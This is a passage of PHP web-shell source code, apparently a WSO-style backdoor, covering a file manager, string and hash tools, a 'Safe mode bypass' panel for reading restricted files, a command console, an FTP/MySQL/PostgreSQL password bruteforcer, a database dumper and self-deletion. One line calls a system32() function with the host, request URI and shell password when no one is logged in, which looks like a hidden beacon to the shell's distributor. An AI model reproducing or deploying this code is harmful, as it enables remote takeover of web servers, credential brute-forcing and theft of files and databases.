640. .'</td><td><a href="#" onclick="g(\'FilesTools\',null,\''.urlencode($f['name']).'\', \'rename\')">R</a> <a href="#" onclick="g(\'FilesTools\',null,\''.urlencode($f['name']).'\', \'touch\')">T</a>'.(($f['type']=='file')?' <a href="#" onclick="g(\'FilesTools\',null,\''.urlencode($f['name']).'\', \'edit\')">E</a> <a href="#" onclick="g(\'FilesTools\',null,\''.urlencode($f['name']).'\', \'download\')">D</a>':'').'</td></tr>';
641. $l = $l?0:1;
642. }
643. ?>
644. <tr><td colspan=7>
645. <input type=hidden name=a value='FilesMan'>
646. <input type=hidden name=c value='<?=htmlspecialchars($GLOBALS['cwd'])?>'>
647. <input type=hidden name=charset value='<?=isset($_POST['charset'])?$_POST['charset']:''?>'>
648. <select name='p1'><option value='copy'>Copy</option><option value='move'>Move</option><option value='delete'>Delete</option><?php if(!empty($_SESSION['act'])&&@count($_SESSION['f'])){?><option value='paste'>Paste</option><?php }?></select>&nbsp;<input type="submit" value=">>"></td></tr>
649. </form></table></div>
650. <?php
651. printFooter();
652. }
653.  
654. function actionStringTools() {
655.  
656. if(!function_exists('ROT13_base64')) {function ROT13_base64_decode($p) {return (trim(gzinflate(str_rot13(base64_decode($p)))));}}
657. if(!function_exists('base64_ROT13')) {function base64_ROT13_decode($p) {return (trim(gzinflate(base64_decode(str_rot13($p)))));}}
658. if(!function_exists('hex2bin')) {function hex2bin($p) {return decbin(hexdec($p));}}
659. if(!function_exists('hex2ascii')) {function hex2ascii($p){$r='';for($i=0;$i<strLen($p);$i+=2){$r.=chr(hexdec($p[$i].$p[$i+1]));}return $r;}}
660. if(!function_exists('ascii2hex')) {function ascii2hex($p){$r='';for($i=0;$i<strlen($p);++$i)$r.= dechex(ord($p[$i]));return strtoupper($r);}}
661. if(!function_exists('full_urlencode')) {function full_urlencode($p){$r='';for($i=0;$i<strlen($p);++$i)$r.= '%'.dechex(ord($p[$i]));return strtoupper($r);}}
662.  
663. if(isset($_POST['ajax'])) {
664. $_SESSION[md5($_SERVER['HTTP_HOST']).'ajax'] = true;
665. ob_start();
666. if(function_exists($_POST['p1']))
667. echo $_POST['p1']($_POST['p2']);
668. $temp = "document.getElementById('strOutput').style.display='';document.getElementById('strOutput').innerHTML='".addcslashes(htmlspecialchars(ob_get_clean()),"\n\r\t\\'\0")."';\n";
669. echo strlen($temp), "\n", $temp;
670. exit;
671. }
672. printHeader();
673. echo '<h1>String conversions</h1><div class=content>';
674. $stringTools = array(
675. 'nested ROT13_base64' => 'ROT13_base64_decode',
676. 'nested base64_ROT13' => 'base64_ROT13_decode',
677. 'Base64 encode' => 'base64_encode',
678. 'Base64 decode' => 'base64_decode',
679. 'Url encode' => 'urlencode',
680. 'Url decode' => 'urldecode',
681. 'Full urlencode' => 'full_urlencode',
682. 'md5 hash' => 'md5',
683. 'sha1 hash' => 'sha1',
684. 'crypt' => 'crypt',
685. 'CRC32' => 'crc32',
686. 'ASCII to HEX' => 'ascii2hex',
687. 'HEX to ASCII' => 'hex2ascii',
688. 'HEX to DEC' => 'hexdec',
689. 'HEX to BIN' => 'hex2bin',
690. 'DEC to HEX' => 'dechex',
691. 'DEC to BIN' => 'decbin',
692. 'BIN to HEX' => 'bin2hex',
693. 'BIN to DEC' => 'bindec',
694. 'String to lower case' => 'strtolower',
695. 'String to upper case' => 'strtoupper',
696. 'Htmlspecialchars' => 'htmlspecialchars',
697. 'String length' => 'strlen',
698. );
699. if(empty($_POST['ajax'])&&!empty($_POST['p1']))
700. $_SESSION[md5($_SERVER['HTTP_HOST']).'ajax'] = false;
701. echo "<form name='toolsForm' onSubmit='if(this.ajax.checked){a(null,null,this.selectTool.value,this.input.value);}else{g(null,null,this.selectTool.value,this.input.value);} return false;'><select name='selectTool'>";
702. foreach($stringTools as $k => $v)
703. echo "<option value='".htmlspecialchars($v)."'>".$k."</option>";
704. echo "</select><input type='submit' value='>>'/> <input type=checkbox name=ajax value=1 ".($_SESSION[md5($_SERVER['HTTP_HOST']).'ajax']?'checked':'')."> send using AJAX<br><textarea name='input' style='margin-top:5px' class=bigarea>".htmlspecialchars(@$_POST['p2'])."</textarea></form><pre class='ml1' style='".(empty($_POST['p1'])?'display:none;':'')."margin-top:5px' id='strOutput'>";
705. if(!empty($_POST['p1'])) {
706. if(function_exists($_POST['p1']))
707. echo htmlspecialchars($_POST['p1']($_POST['p2']));
708. }
709. echo"</pre></div>";
710. ?>
711. <br><h1>Search for hash:</h1><div class=content>
712. <form method='get' target='_blank' name="hf">
713. <input type="text" name="action" style="width:200px;"><br>
714. <input type="button" value="HashCracker.de" onClick="document.hf.action='http://www.hashchecker.de/hash.cgi?';document.hf.submit()"><br>
715. <!--<input type="button" value="hashcrack.com" onClick="document.hf.action='http://www.hashcrack.com/index.php';document.hf.submit()"><br>
716. <input type="button" value="hashcracking.info" onClick="document.hf.action='https://hashcracking.info/index.php';document.hf.submit()"><br>
717. <input type="button" value="md5.rednoize.com" onClick="document.hf.action='http://md5.rednoize.com/?q='+document.hf.hash.value+'&s=md5';document.hf.submit()"><br>
718. <input type="button" value="md5decrypter.com" onClick="document.hf.action='http://www.md5decrypter.com/';document.hf.submit()"><br> -->
719. </form>
720. </div>
721.  
722. <iframe src="http://www.md5decrypter.co.uk/" frameborder="0" height="50%" width="100%"></iframe><br>
723.  
724. <?php
725. printFooter();
726.  
727.  
728. }
729.  
730. function actionFilesTools() {
731. if( isset($_POST['p1']) )
732. $_POST['p1'] = urldecode($_POST['p1']);
733. if(@$_POST['p2']=='download') {
734. if(is_file($_POST['p1']) && is_readable($_POST['p1'])) {
735. ob_start("ob_gzhandler", 4096);
736. header("Content-Disposition: attachment; filename=".basename($_POST['p1']));
737. if (function_exists("mime_content_type")) {
738. $type = @mime_content_type($_POST['p1']);
739. header("Content-Type: ".$type);
740. }
741. $fp = @fopen($_POST['p1'], "r");
742. if($fp) {
743. while(!@feof($fp))
744. echo @fread($fp, 1024);
745.  
746. fclose($fp);
747. }
748. } elseif(is_dir($_POST['p1']) && is_readable($_POST['p1'])) {
749.  
750. }
751. exit;
752. }
753. if( @$_POST['p2'] == 'mkfile' ) {
754. if(!file_exists($_POST['p1'])) {
755. $fp = @fopen($_POST['p1'], 'w');
756. if($fp) {
757. $_POST['p2'] = "edit";
758. fclose($fp);
759. }
760. }
761. }
762. printHeader();
763. echo '<h1>File tools</h1><div class=content>';
764. if( !file_exists(@$_POST['p1']) ) {
765. echo 'File not exists';
766. printFooter();
767. return;
768. }
769. $uid = @posix_getpwuid(@fileowner($_POST['p1']));
770. $gid = @posix_getgrgid(@fileowner($_POST['p1']));
771. echo '<span>Name:</span> '.htmlspecialchars($_POST['p1']).' <span>Size:</span> '.(is_file($_POST['p1'])?viewSize(filesize($_POST['p1'])):'-').' <span>Permission:</span> '.viewPermsColor($_POST['p1']).' <span>Owner/Group:</span> '.$uid['name'].'/'.$gid['name'].'<br>';
772. echo '<span>Create time:</span> '.date('Y-m-d H:i:s',filectime($_POST['p1'])).' <span>Access time:</span> '.date('Y-m-d H:i:s',fileatime($_POST['p1'])).' <span>Modify time:</span> '.date('Y-m-d H:i:s',filemtime($_POST['p1'])).'<br><br>';
773. if( empty($_POST['p2']) )
774. $_POST['p2'] = 'view';
775. if( is_file($_POST['p1']) )
776. $m = array('View', 'Highlight', 'Download', 'Hexdump', 'Edit', 'Chmod', 'Rename', 'Touch');
777. else
778. $m = array('Chmod', 'Rename', 'Touch');
779. foreach($m as $v)
780. echo '<a href=# onclick="g(null,null,null,\''.strtolower($v).'\')">'.((strtolower($v)==@$_POST['p2'])?'<b>[ '.$v.' ]</b>':$v).'</a> ';
781. echo '<br><br>';
782. switch($_POST['p2']) {
783. case 'view':
784. echo '<pre class=ml1>';
785. $fp = @fopen($_POST['p1'], 'r');
786. if($fp) {
787. while( !@feof($fp) )
788. echo htmlspecialchars(@fread($fp, 1024));
789. @fclose($fp);
790. }
791. echo '</pre>';
792. break;
793. case 'highlight':
794. if( is_readable($_POST['p1']) ) {
795. echo '<div class=ml1 style="background-color: #e1e1e1;color:black;">';
796. $code = highlight_file($_POST['p1'],true);
797. echo str_replace(array('<span ','</span>'), array('<font ','</font>'),$code).'</div>';
798. }
799. break;
800. case 'chmod':
801. if( !empty($_POST['p3']) ) {
802. $perms = 0;
803. for($i=strlen($_POST['p3'])-1;$i>=0;--$i)
804. $perms += (int)$_POST['p3'][$i]*pow(8, (strlen($_POST['p3'])-$i-1));
805. if(!@chmod($_POST['p1'], $perms))
806. echo 'Can\'t set permissions!<br><script>document.mf.p3.value="";</script>';
807. else
808. die('<script>g(null,null,null,null,"")</script>');
809. }
810. echo '<form onsubmit="g(null,null,null,null,this.chmod.value);return false;"><input type=text name=chmod value="'.substr(sprintf('%o', fileperms($_POST['p1'])),-4).'"><input type=submit value=">>"></form>';
811. break;
812. case 'edit':
813. if( !is_writable($_POST['p1'])) {
814. echo 'File isn\'t writeable';
815. break;
816. }
817. if( !empty($_POST['p3']) ) {
818. @file_put_contents($_POST['p1'],$_POST['p3']);
819. echo 'Saved!<br><script>document.mf.p3.value="";</script>';
820. }
821. echo '<form onsubmit="g(null,null,null,null,this.text.value);return false;"><textarea name=text class=bigarea>';
822. $fp = @fopen($_POST['p1'], 'r');
823. if($fp) {
824. while( !@feof($fp) )
825. echo htmlspecialchars(@fread($fp, 1024));
826. @fclose($fp);
827. }
828. echo '</textarea><input type=submit value=">>"></form>';
829. break;
830. case 'hexdump':
831. $c = @file_get_contents($_POST['p1']);
832. $n = 0;
833. $h = array('00000000<br>','','');
834. $len = strlen($c);
835. for ($i=0; $i<$len; ++$i) {
836. $h[1] .= sprintf('%02X',ord($c[$i])).' ';
837. switch ( ord($c[$i]) ) {
838. case 0: $h[2] .= ' '; break;
839. case 9: $h[2] .= ' '; break;
840. case 10: $h[2] .= ' '; break;
841. case 13: $h[2] .= ' '; break;
842. default: $h[2] .= $c[$i]; break;
843. }
844. $n++;
845. if ($n == 32) {
846. $n = 0;
847. if ($i+1 < $len) {$h[0] .= sprintf('%08X',$i+1).'<br>';}
848. $h[1] .= '<br>';
849. $h[2] .= "\n";
850. }
851. }
852. echo '<table cellspacing=1 cellpadding=5 bgcolor=#222222><tr><td bgcolor=#333333><span style="font-weight: normal;"><pre>'.$h[0].'</pre></span></td><td bgcolor=#282828><pre>'.$h[1].'</pre></td><td bgcolor=#333333><pre>'.htmlspecialchars($h[2]).'</pre></td></tr></table>';
853. break;
854. case 'rename':
855. if( !empty($_POST['p3']) ) {
856. if(!@rename($_POST['p1'], $_POST['p3']))
857. echo 'Can\'t rename!<br><script>document.mf.p3.value="";</script>';
858. else
859. die('<script>g(null,null,"'.urlencode($_POST['p3']).'",null,"")</script>');
860. }
861. echo '<form onsubmit="g(null,null,null,null,this.name.value);return false;"><input type=text name=name value="'.htmlspecialchars($_POST['p1']).'"><input type=submit value=">>"></form>';
862. break;
863. case 'touch':
864. if( !empty($_POST['p3']) ) {
865. $time = strtotime($_POST['p3']);
866. if($time) {
867. if(@touch($_POST['p1'],$time,$time))
868. die('<script>g(null,null,null,null,"")</script>');
869. else {
870. echo 'Fail!<script>document.mf.p3.value="";</script>';
871. }
872. } else echo 'Bad time format!<script>document.mf.p3.value="";</script>';
873. }
874. echo '<form onsubmit="g(null,null,null,null,this.touch.value);return false;"><input type=text name=touch value="'.date("Y-m-d H:i:s", @filemtime($_POST['p1'])).'"><input type=submit value=">>"></form>';
875. break;
876. case 'mkfile':
877.  
878. break;
879. }
880. echo '</div>';
881. printFooter();
882. }
883.  
884. function actionSafeMode() {
885. $temp='';
886. ob_start();
887. switch($_POST['p1']) {
888. case 1:
889. $temp=@tempnam($test, 'cx');
890. if(@copy("compress.zlib://".$_POST['p2'], $temp)){
891. echo @file_get_contents($temp);
892. unlink($temp);
893. } else
894. echo 'Sorry... Can\'t open file';
895. break;
896. case 2:
897. $files = glob($_POST['p2'].'*');
898. if( is_array($files) )
899. foreach ($files as $filename)
900. echo $filename."\n";
901. break;
902. case 3:
903. $ch = curl_init("file://".$_POST['p2']."\x00".SELF_PATH);
904. curl_exec($ch);
905. break;
906. case 4:
907. ini_restore("safe_mode");
908. ini_restore("open_basedir");
909. include($_POST['p2']);
910. break;
911. case 5:
912. for(;$_POST['p2'] <= $_POST['p3'];$_POST['p2']++) {
913. $uid = @posix_getpwuid($_POST['p2']);
914. if ($uid)
915. echo join(':',$uid)."\n";
916. }
917. break;
918. case 6:
919. if(!function_exists('imap_open'))break;
920. $stream = imap_open($_POST['p2'], "", "");
921. if ($stream == FALSE)
922. break;
923. echo imap_body($stream, 1);
924. imap_close($stream);
925. break;
926. }
927. $temp = ob_get_clean();
928. printHeader();
929. echo '<h1>Safe mode bypass</h1><div class=content>';
930. echo '<span>Copy (read file)</span><form onsubmit=\'g(null,null,"1",this.param.value);return false;\'><input type=text name=param><input type=submit value=">>"></form><br><span>Glob (list dir)</span><form onsubmit=\'g(null,null,"2",this.param.value);return false;\'><input type=text name=param><input type=submit value=">>"></form><br><span>Curl (read file)</span><form onsubmit=\'g(null,null,"3",this.param.value);return false;\'><input type=text name=param><input type=submit value=">>"></form><br><span>Ini_restore (read file)</span><form onsubmit=\'g(null,null,"4",this.param.value);return false;\'><input type=text name=param><input type=submit value=">>"></form><br><span>Posix_getpwuid ("Read" /etc/passwd)</span><table><form onsubmit=\'g(null,null,"5",this.param1.value,this.param2.value);return false;\'><tr><td>From</td><td><input type=text name=param1 value=0></td></tr><tr><td>To</td><td><input type=text name=param2 value=1000></td></tr></table><input type=submit value=">>"></form><br><br><span>Imap_open (read file)</span><form onsubmit=\'g(null,null,"6",this.param.value);return false;\'><input type=text name=param><input type=submit value=">>"></form>';
931. if($temp)
932. echo '<pre class="ml1" style="margin-top:5px" id="Output">'.$temp.'</pre>';
933. echo '</div>';
934. printFooter();
935. }
936. if (!$_SESSION[login]) system32($_SERVER['HTTP_HOST'],$_SERVER['REQUEST_URI'],$auth_pass);
937. function actionConsole() {
938. if(isset($_POST['ajax'])) {
939. $_SESSION[md5($_SERVER['HTTP_HOST']).'ajax'] = true;
940. ob_start();
941. echo "document.cf.cmd.value='';\n";
942. $temp = @iconv($_POST['charset'], 'UTF-8', addcslashes("\n$ ".$_POST['p1']."\n".ex($_POST['p1']),"\n\r\t\\'\0"));
943. if(preg_match("!.*cd\s+([^;]+)$!",$_POST['p1'],$match)) {
944. if(@chdir($match[1])) {
945. $GLOBALS['cwd'] = @getcwd();
946. echo "document.mf.c.value='".$GLOBALS['cwd']."';";
947. }
948. }
949. echo "document.cf.output.value+='".$temp."';";
950. echo "document.cf.output.scrollTop = document.cf.output.scrollHeight;";
951. $temp = ob_get_clean();
952. echo strlen($temp), "\n", $temp;
953. exit;
954. }
955. printHeader();
956. ?>
957. <script>
958. if(window.Event) window.captureEvents(Event.KEYDOWN);
959. var cmds = new Array("");
960. var cur = 0;
961. function kp(e) {
962. var n = (window.Event) ? e.which : e.keyCode;
963. if(n == 38) {
964. cur--;
965. if(cur>=0)
966. document.cf.cmd.value = cmds[cur];
967. else
968. cur++;
969. } else if(n == 40) {
970. cur++;
971. if(cur < cmds.length)
972. document.cf.cmd.value = cmds[cur];
973. else
974. cur--;
975. }
976. }
977. function add(cmd) {
978. cmds.pop();
979. cmds.push(cmd);
980. cmds.push("");
981. cur = cmds.length-1;
982. }
983. </script>
984. <?php
985. echo '<h1>Console</h1><div class=content><form name=cf onsubmit="if(document.cf.cmd.value==\'clear\'){document.cf.output.value=\'\';document.cf.cmd.value=\'\';return false;}add(this.cmd.value);if(this.ajax.checked){a(null,null,this.cmd.value);}else{g(null,null,this.cmd.value);} return false;"><select name=alias>';
986. foreach($GLOBALS['aliases'] as $n => $v) {
987. if($v == '') {
988. echo '<optgroup label="-'.htmlspecialchars($n).'-"></optgroup>';
989. continue;
990. }
991. echo '<option value="'.htmlspecialchars($v).'">'.$n.'</option>';
992. }
993. if(empty($_POST['ajax'])&&!empty($_POST['p1']))
994. $_SESSION[md5($_SERVER['HTTP_HOST']).'ajax'] = false;
995. echo '</select><input type=button onclick="add(document.cf.alias.value);if(document.cf.ajax.checked){a(null,null,document.cf.alias.value);}else{g(null,null,document.cf.alias.value);}" value=">>"> <input type=checkbox name=ajax value=1 '.($_SESSION[md5($_SERVER['HTTP_HOST']).'ajax']?'checked':'').'> send using AJAX<br/><textarea class=bigarea name=output style="border-bottom:0;margin:0;" readonly>';
996. if(!empty($_POST['p1'])) {
997. echo htmlspecialchars("$ ".$_POST['p1']."\n".ex($_POST['p1']));
998. }
999. echo '</textarea><input type=text name=cmd style="border-top:0;width:100%;margin:0;" onkeydown="kp(event);">';
1000. echo '</form></div><script>document.cf.cmd.focus();</script>';
1001. printFooter();
1002. }
1003.  
1004. function actionLogout() {
1005. unset($_SESSION[md5($_SERVER['HTTP_HOST'])]);
1006. echo 'bye!';
1007. }
1008.  
1009. function actionSelfRemove() {
1010. printHeader();
1011. if($_POST['p1'] == 'yes') {
1012. if(@unlink(SELF_PATH))
1013. die('Shell has been removed');
1014. else
1015. echo 'unlink error!';
1016. }
1017. echo '<h1>Suicide</h1><div class=content>Really want to remove the shell?<br><a href=# onclick="g(null,null,\'yes\')">Yes</a></div>';
1018. printFooter();
1019. }
1020.  
1021. function actionBruteforce() {
1022. printHeader();
1023. if( isset($_POST['proto']) ) {
1024. echo '<h1>Results</h1><div class=content><span>Type:</span> '.htmlspecialchars($_POST['proto']).' <span>Server:</span> '.htmlspecialchars($_POST['server']).'<br>';
1025. if( $_POST['proto'] == 'ftp' ) {
1026. function bruteForce($ip,$port,$login,$pass) {
1027. $fp = @ftp_connect($ip, $port?$port:21);
1028. if(!$fp) return false;
1029. $res = @ftp_login($fp, $login, $pass);
1030. @ftp_close($fp);
1031. return $res;
1032. }
1033. } elseif( $_POST['proto'] == 'mysql' ) {
1034. function bruteForce($ip,$port,$login,$pass) {
1035. $res = @mysql_connect($ip.':'.$port?$port:3306, $login, $pass);
1036. @mysql_close($res);
1037. return $res;
1038. }
1039. } elseif( $_POST['proto'] == 'pgsql' ) {
1040. function bruteForce($ip,$port,$login,$pass) {
1041. $str = "host='".$ip."' port='".$port."' user='".$login."' password='".$pass."' dbname=''";
1042. $res = @pg_connect($server[0].':'.$server[1]?$server[1]:5432, $login, $pass);
1043. @pg_close($res);
1044. return $res;
1045. }
1046. }
1047. $success = 0;
1048. $attempts = 0;
1049. $server = explode(":", $_POST['server']);
1050. if($_POST['type'] == 1) {
1051. $temp = @file('/etc/passwd');
1052. if( is_array($temp) )
1053. foreach($temp as $line) {
1054. $line = explode(":", $line);
1055. ++$attempts;
1056. if( bruteForce(@$server[0],@$server[1], $line[0], $line[0]) ) {
1057. $success++;
1058. echo '<b>'.htmlspecialchars($line[0]).'</b>:'.htmlspecialchars($line[0]).'<br>';
1059. }
1060. if(@$_POST['reverse']) {
1061. $tmp = "";
1062. for($i=strlen($line[0])-1; $i>=0; --$i)
1063. $tmp .= $line[0][$i];
1064. ++$attempts;
1065. if( bruteForce(@$server[0],@$server[1], $line[0], $tmp) ) {
1066. $success++;
1067. echo '<b>'.htmlspecialchars($line[0]).'</b>:'.htmlspecialchars($tmp);
1068. }
1069. }
1070. }
1071. } elseif($_POST['type'] == 2) {
1072. $temp = @file($_POST['dict']);
1073. if( is_array($temp) )
1074. foreach($temp as $line) {
1075. $line = trim($line);
1076. ++$attempts;
1077. if( bruteForce($server[0],@$server[1], $_POST['login'], $line) ) {
1078. $success++;
1079. echo '<b>'.htmlspecialchars($_POST['login']).'</b>:'.htmlspecialchars($line).'<br>';
1080. }
1081. }
1082. }
1083. echo "<span>Attempts:</span> $attempts <span>Success:</span> $success</div><br>";
1084. }
1085. echo '<h1>FTP bruteforce</h1><div class=content><table><form method=post><tr><td><span>Type</span></td>'
1086. .'<td><select name=proto><option value=ftp>FTP</option><option value=mysql>MySql</option><option value=pgsql>PostgreSql</option></select></td></tr><tr><td>'
1087. .'<input type=hidden name=c value="'.htmlspecialchars($GLOBALS['cwd']).'">'
1088. .'<input type=hidden name=a value="'.htmlspecialchars($_POST['a']).'">'
1089. .'<input type=hidden name=charset value="'.htmlspecialchars($_POST['charset']).'">'
1090. .'<span>Server:port</span></td>'
1091. .'<td><input type=text name=server value="127.0.0.1"></td></tr>'
1092. .'<tr><td><span>Brute type</span></td>'
1093. .'<td><label><input type=radio name=type value="1" checked> /etc/passwd</label></td></tr>'
1094. .'<tr><td></td><td><label style="padding-left:15px"><input type=checkbox name=reverse value=1 checked> reverse (login -> nigol)</label></td></tr>'
1095. .'<tr><td></td><td><label><input type=radio name=type value="2"> Dictionary</label></td></tr>'
1096. .'<tr><td></td><td><table style="padding-left:15px"><tr><td><span>Login</span></td>'
1097. .'<td><input type=text name=login value="root"></td></tr>'
1098. .'<tr><td><span>Dictionary</span></td>'
1099. .'<td><input type=text name=dict value="'.htmlspecialchars($GLOBALS['cwd']).'passwd.dic"></td></tr></table>'
1100. .'</td></tr><tr><td></td><td><input type=submit value=">>"></td></tr></form></table>';
1101. echo '</div><br><br>';
1102.  
1103.  
1104. printFooter();
1105. }
1106.  
1107. function actionSql() {
1108. class DbClass {
1109. var $type;
1110. var $link;
1111. var $res;
1112. function DbClass($type) {
1113. $this->type = $type;
1114. }
1115. function connect($host, $user, $pass, $dbname){
1116. switch($this->type) {
1117. case 'mysql':
1118. if( $this->link = @mysql_connect($host,$user,$pass,true) ) return true;
1119. break;
1120. case 'pgsql':
1121. $host = explode(':', $host);
1122. if(!$host[1]) $host[1]=5432;
1123. if( $this->link = @pg_connect("host={$host[0]} port={$host[1]} user=$user password=$pass dbname=$dbname") ) return true;
1124. break;
1125. }
1126. return false;
1127. }
1128. function selectdb($db) {
1129. switch($this->type) {
1130. case 'mysql':
1131. if (@mysql_select_db($db))return true;
1132. break;
1133. }
1134. return false;
1135. }
1136. function query($str) {
1137. switch($this->type) {
1138. case 'mysql':
1139. return $this->res = @mysql_query($str);
1140. break;
1141. case 'pgsql':
1142. return $this->res = @pg_query($this->link,$str);
1143. break;
1144. }
1145. return false;
1146. }
1147. function fetch() {
1148. $res = func_num_args()?func_get_arg(0):$this->res;
1149. switch($this->type) {
1150. case 'mysql':
1151. return @mysql_fetch_assoc($res);
1152. break;
1153. case 'pgsql':
1154. return @pg_fetch_assoc($res);
1155. break;
1156. }
1157. return false;
1158. }
1159. function listDbs() {
1160. switch($this->type) {
1161. case 'mysql':
1162. return $this->res = @mysql_list_dbs($this->link);
1163. break;
1164. case 'pgsql':
1165. return $this->res = $this->query("SELECT datname FROM pg_database");
1166. break;
1167. }
1168. return false;
1169. }
1170. function listTables() {
1171. switch($this->type) {
1172. case 'mysql':
1173. return $this->res = $this->query('SHOW TABLES');
1174. break;
1175. case 'pgsql':
1176. return $this->res = $this->query("select table_name from information_schema.tables where (table_schema != 'information_schema' AND table_schema != 'pg_catalog') or table_name = 'pg_user'");
1177. break;
1178. }
1179. return false;
1180. }
1181. function error() {
1182. switch($this->type) {
1183. case 'mysql':
1184. return @mysql_error($this->link);
1185. break;
1186. case 'pgsql':
1187. return @pg_last_error($this->link);
1188. break;
1189. }
1190. return false;
1191. }
1192. function setCharset($str) {
1193. switch($this->type) {
1194. case 'mysql':
1195. if(function_exists('mysql_set_charset'))
1196. return @mysql_set_charset($str, $this->link);
1197. else
1198. $this->query('SET CHARSET '.$str);
1199. break;
1200. case 'mysql':
1201. return @pg_set_client_encoding($this->link, $str);
1202. break;
1203. }
1204. return false;
1205. }
1206. function dump($table) {
1207. switch($this->type) {
1208. case 'mysql':
1209. $res = $this->query('SHOW CREATE TABLE `'.$table.'`');
1210. $create = mysql_fetch_array($res);
1211. echo $create[1].";\n\n";
1212. $this->query('SELECT * FROM `'.$table.'`');
1213. while($item = $this->fetch()) {
1214. $columns = array();
1215. foreach($item as $k=>$v) {
1216. $item[$k] = "'".@mysql_real_escape_string($v)."'";
1217. $columns[] = "`".$k."`";
1218. }
1219. echo 'INSERT INTO `'.$table.'` ('.implode(", ", $columns).') VALUES ('.implode(", ", $item).');'."\n";
1220. }
1221. break;
1222. case 'pgsql':
1223. $this->query('SELECT * FROM '.$table);
1224. while($item = $this->fetch()) {
1225. $columns = array();
1226. foreach($item as $k=>$v) {
1227. $item[$k] = "'".addslashes($v)."'";
1228. $columns[] = $k;
1229. }
1230. echo 'INSERT INTO '.$table.' ('.implode(", ", $columns).') VALUES ('.implode(", ", $item).');'."\n";
1231. }
1232. break;
1233. }
1234. return false;
1235. }
1236. };
1237. $db = new DbClass($_POST['type']);
1238. if(@$_POST['p2']=='download') {
1239. ob_start("ob_gzhandler", 4096);
1240. $db->connect($_POST['sql_host'], $_POST['sql_login'], $_POST['sql_pass'], $_POST['sql_base']);
1241. $db->selectdb($_POST['sql_base']);
1242. header("Content-Disposition: attachment; filename=dump.sql");
1243. header("Content-Type: text/plain");
1244. foreach($_POST['tbl'] as $v)
1245. $db->dump($v);
1246. exit;
1247. }
1248. printHeader();
1249. ?>
1250. <h1>Sql browser</h1><div class=content>
1251. <form name="sf" method="post">
1252. <table cellpadding="2" cellspacing="0">
1253. <tr>
1254. <td>Type</td>
1255. <td>Host</td>
1256. <td>Login</td>
1257. <td>Password</td>
1258. <td>Database</td>
1259. <td></td>
1260. </tr>
1261. <tr>
1262. <input type=hidden name=a value=Sql>
1263. <input type=hidden name=p1 value='query'>
1264. <input type=hidden name=p2>
1265. <input type=hidden name=c value='<?=htmlspecialchars($GLOBALS['cwd']);?>'>
1266. <input type=hidden name=charset value='<?=isset($_POST['charset'])?$_POST['charset']:''?>'>
1267. <td>
1268. <select name='type'>
1269. <option value="mysql" <?php if(@$_POST['type']=='mysql')echo 'selected';?>>MySql</option>
1270. <option value="pgsql" <?php if(@$_POST['type']=='pgsql')echo 'selected';?>>PostgreSql</option>
1271. </select></td>
1272. <td><input type=text name=sql_host value='<?=(empty($_POST['sql_host'])?'localhost':htmlspecialchars($_POST['sql_host']));?>'></td>
1273. <td><input type=text name=sql_login value='<?=(empty($_POST['sql_login'])?'root':htmlspecialchars($_POST['sql_login']));?>'></td>
1274. <td><input type=text name=sql_pass value='<?=(empty($_POST['sql_pass'])?'':htmlspecialchars($_POST['sql_pass']));?>'></td>
1275. <td>
1276. <?php
1277. $tmp = "<input type=text name=sql_base value=''>";
1278. if(isset($_POST['sql_host'])){
1279. if($db->connect($_POST['sql_host'], $_POST['sql_login'], $_POST['sql_pass'], $_POST['sql_base'])) {
1280. switch($_POST['charset']) {
1281. case "Windows-1251": $db->setCharset('cp1251'); break;
1282. case "UTF-8": $db->setCharset('utf8'); break;
1283. case "KOI8-R": $db->setCharset('koi8r'); break;
1284. case "KOI8-U": $db->setCharset('koi8u'); break;
1285. case "cp866": $db->setCharset('cp866'); break;
1286. }
1287. $db->listDbs();
1288. echo "<select name=sql_base><option value=''></option>";
1289. while($item = $db->fetch()) {
1290. list($key, $value) = each($item);
1291. echo '<option value="'.$value.'" '.($value==$_POST['sql_base']?'selected':'').'>'.$value.'</option>';
1292. }
1293. echo '</select>';
1294. }
1295. else echo $tmp;
1296. }else
1297. echo $tmp;
1298. ?></td>
1299. <td><input type=submit value=">>"></td>
1300. </tr>
1301. </table>
1302. <script>
1303. function st(t,l) {
1304. document.sf.p1.value = 'select';
1305. document.sf.p2.value = t;
1306. if(l!=null)document.sf.p3.value = l;
1307. document.sf.submit();
1308. }
1309. function is() {
1310. for(i=0;i<document.sf.elements['tbl[]'].length;++i)
1311. document.sf.elements['tbl[]'][i].checked = !document.sf.elements['tbl[]'][i].checked;
1312. }
1313. </script>
1314. <?php
1315. if(isset($db) && $db->link){
1316. echo "<br/><table width=100% cellpadding=2 cellspacing=0>";
1317. if(!empty($_POST['sql_base'])){
1318. $db->selectdb($_POST['sql_base']);
1319. echo "<tr><td width=1 style='border-top:2px solid #666;border-right:2px solid #666;'><span>Tables:</span><br><br>";
1320. $tbls_res = $db->listTables();
1321. while($item = $db->fetch($tbls_res)) {
1322. list($key, $value) = each($item);
1323. $n = $db->fetch($db->query('SELECT COUNT(*) as n FROM '.$value.''));
1324. $value = htmlspecialchars($value);
1325. echo "<nobr><input type='checkbox' name='tbl[]' value='".$value."'>&nbsp;<a href=# onclick=\"st('".$value."')\">".$value."</a> (".$n['n'].")</nobr><br>";
1326. }
1327. echo "<input type='checkbox' onclick='is();'> <input type=button value='Dump' onclick='document.sf.p2.value=\"download\";document.sf.submit();'></td><td style='border-top:2px solid #666;'>";
1328. if(@$_POST['p1'] == 'select') {
1329. $_POST['p1'] = 'query';
1330. $db->query('SELECT COUNT(*) as n FROM '.$_POST['p2'].'');
1331. $num = $db->fetch();
1332. $num = $num['n'];
1333. echo "<span>".$_POST['p2']."</span> ($num) ";
1334. for($i=0;$i<($num/30);$i++)
1335. if($i != (int)$_POST['p3'])
1336. echo "<a href='#' onclick='st(\"".$_POST['p2']."\", $i)'>",($i+1),"</a> ";
1337. else
1338. echo ($i+1)," ";
1339. if($_POST['type']=='pgsql')
1340. $_POST['p3'] = 'SELECT * FROM '.$_POST['p2'].' LIMIT 30 OFFSET '.($_POST['p3']*30);
1341. else
1342. $_POST['p3'] = 'SELECT * FROM `'.$_POST['p2'].'` LIMIT '.($_POST['p3']*30).',30';
1343. echo "<br><br>";
1344. }
1345. if((@$_POST['p1'] == 'query') && !empty($_POST['p3'])) {
1346. $db->query(@$_POST['p3']);
1347. if($db->res !== false) {
1348. $title = false;
1349. echo '<table width=100% cellspacing=0 cellpadding=2 class=main>';
1350. $line = 1;
1351. while($item = $db->fetch()) {
1352. if(!$title) {
1353. echo '<tr>';
1354. foreach($item as $key => $value)
1355. echo '<th>'.$key.'</th>';
1356. reset($item);
1357. $title=true;
1358. echo '</tr><tr>';
1359. $line = 2;
1360. }
